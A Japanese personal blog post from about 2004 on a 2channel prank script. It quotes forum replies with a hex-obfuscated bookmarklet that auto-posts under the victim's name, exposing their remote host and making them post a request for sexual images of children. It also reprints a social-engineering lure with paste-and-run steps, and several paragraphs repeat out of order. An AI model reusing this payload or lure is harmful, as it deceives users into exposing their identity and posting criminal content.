* ロリ画像トラップ JavaScript
この記事の直リンクURL: Permlink | この記事が属するカテゴリ: [2ch] [JavaScript]
2ちゃんねるのガイドライン板「JavaScript:document.body.innerHTMLのガイドライン2」スレの新作。実行したときの意外性という点で、2004-02-07 のクマー化 Bookmarklet に比肩する逸品。「ロリ画像トラップ JavaScript」という名前はどうかと思ったけど、他に表現しようがないので仕方がない。
一応 Bookmarklet として使うこともできるはず。そんな人はいないだろうけど。
http://that3.2ch.net/test/read.cgi/gline/1076853643/570-
JavaScript の知識が無くても、どんなスクリプトなのかは以下のレスを見ればわかるだろう。
2ちゃんねるでは名前欄に fusianasan と入力して投稿すると、投稿者のリモートホストが表示される。民間企業や官公庁のネットワークから 2ch.net を閲覧してる場合、接続元がわかってしまうというわけだ。たとえば、米国のブッシュ大統領が実は2ちゃんねらーで、上記スクリプトをうっかり実行してしまった場合 whitehouse.gov というリモートホスト名が名前欄に表示されてしまう。たぶん。
2ちゃんねるの文化ではリモートホスト名を晒すのは恥ずかしいこととされているので、やってしまったときは >>577 のようなガッカリ系の書き込みがなされることが多い。ちなみに _| ̄|○ は 2004-02-04 で書いた「くずおれる男」の一種。
2ちゃんねるでは、投稿時に内容と書き込みの責任を確認する画面が表示され、同意した場合のみ書き込める仕組みになっている。同意はクッキーに保存されるため、一度も書き込んだことのない場合はこのスクリプトを実行しても確認画面で引き返すことができる。しかし、書き込んだことがある場合は >>576-577 の様な憂き目に会う。
確かに犯行予告なんかが投稿文字列としてセットされていた日には警察沙汰になりかねない。恐ろしいこと考えるなあ。
今知っておくべき危険〜常時接続時代のセキュリティー 第1回 「2ちゃんねる」を襲った「fusianasanトラップ」の実態
http://web.archive.org/web/20040203014036/http://www.watch.i ...
この結果、以下のような事態となった。
fusianasan トラップはユーザがブラウズするだけで発動するが、ロリ画像トラップはユーザが自分でスクリプトを実行しないと発動しないのでまだかわいい方だ。
一応 Bookmarklet として使うこともできるはず。そんな人はいないだろうけど。
- 「ロリ画像トラップ JavaScript」の発端
JavaScript:document.body.innerHTMLのガイドライン2http://that3.2ch.net/test/read.cgi/gline/1076853643/570-
570 :水先案名無い人 [sage] :04/09/20 22:19:16 ID:k98P/XJ7
こういうのはいかがでつか?
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414745
2e76616c75653d275c75333045445c75333045415
c75373533425c75353043465c75333034465c75333036305c7533
3035355c7533303434273b7375626d69742e636c69636b28293b7
d';for(l=0,e="";l<s.length;l+=2)e+='%'+s.substr(l,2);eval(unescape(e));
ここでお試しくだちぃ。
http://that3.2ch.net/test/read.cgi/gline/1076853643/l1
JavaScript の知識が無くても、どんなスクリプトなのかは以下のレスを見ればわかるだろう。
571 :水先案名無い人 [sage] :04/09/20 22:24:51 ID:0G+v9KPW
>>570
よく考えたな。
572 :水先案名無い人 [sage] :04/09/20 22:35:45 ID:8nGHGwx9
あぶねぇなぁ(W
573 :fusianasan [sage] :04/09/20 23:03:54 ID:gzaeiMlm
ロリ画像ください
574 :水先案名無い人 [sage] :04/09/21 03:09:59 ID:iG9vtk7P
>>570
何これ? ヤバイもんじゃないよね?
575 :水先案名無い人 [sage] :04/09/21 03:58:57 ID:jvvfPiN1
悪戯としてはギリギリセーフ?
576 :p0616-ip01kobeminato.hyogo.ocn.ne.jp :04/09/21 12:54:27 ID:h2OsgDge
ロリ画像ください
577 :水先案名無い人 [sage] :04/09/21 12:55:38 ID:h2OsgDge
NOOOOOOOOOOOOOOOOOOOOOOOO!!!
色々やってたらやっちまったよ_| ̄|○
- 「ロリ画像トラップ JavaScript」の動作
要するに、名前欄に「fusianasan」が、レス入力欄に「ロリ画像ください」がそれぞれ自動入力され、勝手に投稿までされるというスクリプトだ。2ちゃんねるでは名前欄に fusianasan と入力して投稿すると、投稿者のリモートホストが表示される。民間企業や官公庁のネットワークから 2ch.net を閲覧してる場合、接続元がわかってしまうというわけだ。たとえば、米国のブッシュ大統領が実は2ちゃんねらーで、上記スクリプトをうっかり実行してしまった場合 whitehouse.gov というリモートホスト名が名前欄に表示されてしまう。たぶん。
2ちゃんねるの文化ではリモートホスト名を晒すのは恥ずかしいこととされているので、やってしまったときは >>577 のようなガッカリ系の書き込みがなされることが多い。ちなみに _| ̄|○ は 2004-02-04 で書いた「くずおれる男」の一種。
2ちゃんねるでは、投稿時に内容と書き込みの責任を確認する画面が表示され、同意した場合のみ書き込める仕組みになっている。同意はクッキーに保存されるため、一度も書き込んだことのない場合はこのスクリプトを実行しても確認画面で引き返すことができる。しかし、書き込んだことがある場合は >>576-577 の様な憂き目に会う。
578 :水先案名無い人 [sage] :04/09/21 13:01:46 ID:lvw3KE0R
>>576-577
がんばろう神戸!
579 :水先案名無い人 [sage] :04/09/21 13:06:11 ID:QmBoAxpq
漏れの環境だとうまく動かないなぁ。どんなスクリプトかは想像ついたけどw
ロリ画像ください
580 :YahooBB219210111015.bbtec.net :04/09/21 13:35:49 ID:je2GR6mm
ロリ画像ください
581 :水先案名無い人 [sage] :04/09/21 13:36:43 ID:je2GR6mm
見事にやられたOTL
582 :水先案名無い人 [sage] :04/09/21 15:12:34 ID:Z252quqQ
>>576-577
スマンがワロタ
583 :水先案名無い人 [sage] :04/09/21 15:34:31 ID:DOg20UW5
>>576-577
最終テスト検証ありがとー。
(つд`)
さすがに自分じゃ出来なかったから。。。
本当は犯行予告にしようかと思ったけどシャレにならなそうなんでやめといた(w
確かに犯行予告なんかが投稿文字列としてセットされていた日には警察沙汰になりかねない。恐ろしいこと考えるなあ。
- 「ロリ画像トラップ JavaScript」をさらに洗練させる人たち
よりわかりやすい手順を書いて、さらにトラップを洗練させる人たちまでいる。こんなの引っかかるのは小学生や中学生だけかと思ったら、すでに被害者2名。好奇心旺盛な人がたくさんいるということか。593 :水先案名無い人 [sage] :04/09/21 19:03:02 ID:C01ao3LK
>>570
fusianaトラップみたいなテンプレ文ってないの?
594 :水先案名無い人 [sage] :04/09/21 19:15:03 ID:bPp3MRn7
>>593
ついに2ちゃんねるの隠しコマンドが明らかになった!!
みたいな感じで始まる奴?
595 :水先案名無い人 [sage] :04/09/21 19:30:37 ID:C01ao3LK
>>594
そんな感じのヤツ(w
って言うか本家にこんなのが貼られていた
http://that3.2ch.net/test/read.cgi/gline/1078904721/694
694 名前:水先案名無い人 投稿日:2004/09/21(火) 15:29 ID:5EcogbkC
(準備)
2ch専用ブラウザを使用している人は、
IEなどの一般的なブラウザでこのスレを開いておく。
1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。
2、
改行を外して1行にする。
3、
1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。
4、
Enterを押す(もしくは「移動」をクリックする)。
────────────────────
被害者2名(w
- 過去にはもっと悪質な物があった
過去には fusianasan トラップと呼ばれるものがあった。IE のセキュリティホールを突いて、特定のサイトを閲覧しただけで2ちゃんねるにスレを立ててしまうというものだ。今知っておくべき危険〜常時接続時代のセキュリティー 第1回 「2ちゃんねる」を襲った「fusianasanトラップ」の実態
http://web.archive.org/web/20040203014036/http://www.watch.i ...
●「fusianasanトラップ」とは
「fusianasanトラップ」による攻撃は、Internet Explorer(以下、IE)が持っている二種類のセキュリティーホールをうまく利用したものでした。
1つ目は、画像(HTML以外の形式)に偽装したページに含まれるスクリプトが解釈・実行されてしまう欠陥です。
2つ目は、もしスクリプトの実行が禁止されるように設定されていても、IEが新しく対応した「HTML+TIME2(*1)」という技術にあるセキュリティーホールを悪用することで、強制的にスクリプトを実行させるというものです。
この結果、以下のような事態となった。
これらの段階を踏むことで、「2ちゃんねる」が提供する掲示板に対して新規書き込みを行ない、それまでの話題が掲載された「スレッド」を、「過去データ倉庫」に流し込んでしまいました。
「2ちゃんねる」に書き込まれたリンクをクリックした訪問者は、前述の脆弱性やスクリプトの動作を許可していたことによって、ふたたび「2ちゃんねる」に新規スレッドを作成する投稿を強制的に行なわされてしまいます。
しかも、その書き込みには、再びスクリプトを含んだ画像へのリンクが本文として書き込まれます。つまり、「2ちゃんねる」という、ユーザーの非常に多い“掲示板を感染経路にしたワームのようなスクリプト”だったといえます。
その結果、あっという間に書き込みが増え、掲示板は同じタイトルのスレッドで埋め尽くされてしまい、正常な利用ができなくなってしまいました。
fusianasan トラップはユーザがブラウズするだけで発動するが、ロリ画像トラップはユーザが自分でスクリプトを実行しないと発動しないのでまだかわいい方だ。
- すべての記事の見出し (全1029件)
- 全カテゴリの一覧と記事の数
- カテゴリごとに記事をまとめ読みできます。記事の表題だけを見たい場合は、すべての記事の見出し (カテゴリ別表示) へ。
- .net (57件)
- 2ch (19件)
- amazon (5件)
- Apache (22件)
- bash (13件)
- Bookmarklet (9件)
- C# (45件)
- chalow (18件)
- ChangeLog メモ (20件)
- coLinux (2件)
- CSS (5件)
- Delphi (5件)
- DVD (6件)
- Excel (1件)
- F-ZERO (4件)
- FF12 (31件)
- ftp (8件)
- Google (21件)
- gpg (7件)
- HTML (19件)
- http (19件)
- IE (10件)
- IIS (4件)
- iPod (2件)
- JavaScript (14件)
- Linux (63件)
- MCP (6件)
- Mozilla (14件)
- MS SQL Server (30件)
- MySQL (4件)
- Namazu (3件)
- PC (48件)
- Perl (58件)
- PHP (2件)
- Postgres (36件)
- proftpd (2件)
- qmail (1件)
- RFC (4件)
- RSS (33件)
- Ruby (15件)
- samba (3件)
- sonic64.com (6件)
- SQL (15件)
- Squid (3件)
- ssh (7件)
- Subversion (3件)
- unix (31件)
- VSS (2件)
- Windows (34件)
- winny (9件)
- XML (9件)
- xyzzy (17件)
- おいでよ どうぶつの森 (19件)
- お菓子 (5件)
- アスキーアート (13件)
- アニメ (9件)
- クレジットカード (2件)
- ゲーム (120件)
- シェルスクリプト (18件)
- シレン2 (8件)
- セキュリティ (9件)
- ソフトウェア (21件)
- デザインパターン (2件)
- ネットワーク (30件)
- バックアップ (17件)
- プログラミング (14件)
- マリオカートDS (3件)
- メール (26件)
- メモ (116件)
- ラーメン (11件)
- 音楽 (59件)
- 給油 (3件)
- 三国志大戦 (13件)
- 車 (7件)
- 書斎 (4件)
- 食 (30件)
- 買い物 (17件)
- 簿記 (8件)
- 本 (32件)
- 漫画 (9件)
- 2007-04-23 (Mon)
- 2007-03-07 (Wed)
- 2007-02-27 (Tue)
- 2007-01-17 (Wed)
- 2007-01-15 (Mon)
- 2007-01-14 (Sun)
- 2007-01-08 (Mon)
- 2006-12-01 (Fri)
- 2006-11-22 (Wed)
- 2006-11-20 (Mon)
- 2006-11-19 (Sun)
- 2006-09-30 (Sat)
- 2006-08-29 (Tue)
- 2006-08-04 (Fri)
- 2006-07-27 (Thu)
- 2006-07-23 (Sun)
- 2006-07-17 (Mon)
- 2006-07-10 (Mon)
- 2006-07-06 (Thu)
- 2006-07-03 (Mon)
- 2006-06-29 (Thu)
- 2006-06-28 (Wed)
- 2006-06-27 (Tue)
- 2006-06-25 (Sun)
- 2006-06-19 (Mon)
- 2006-06-18 (Sun)
- 2006-06-15 (Thu)
- 2006-06-11 (Sun)
- 2006-06-01 (Thu)
- 2006-05-30 (Tue)
- プロファイル
- 斎藤 宏明。エンジニアです。宇都宮市に住んでいます。
- リンク
- RSS
- スポンサードリンク
- Powered by
- ☆さくらインターネット☆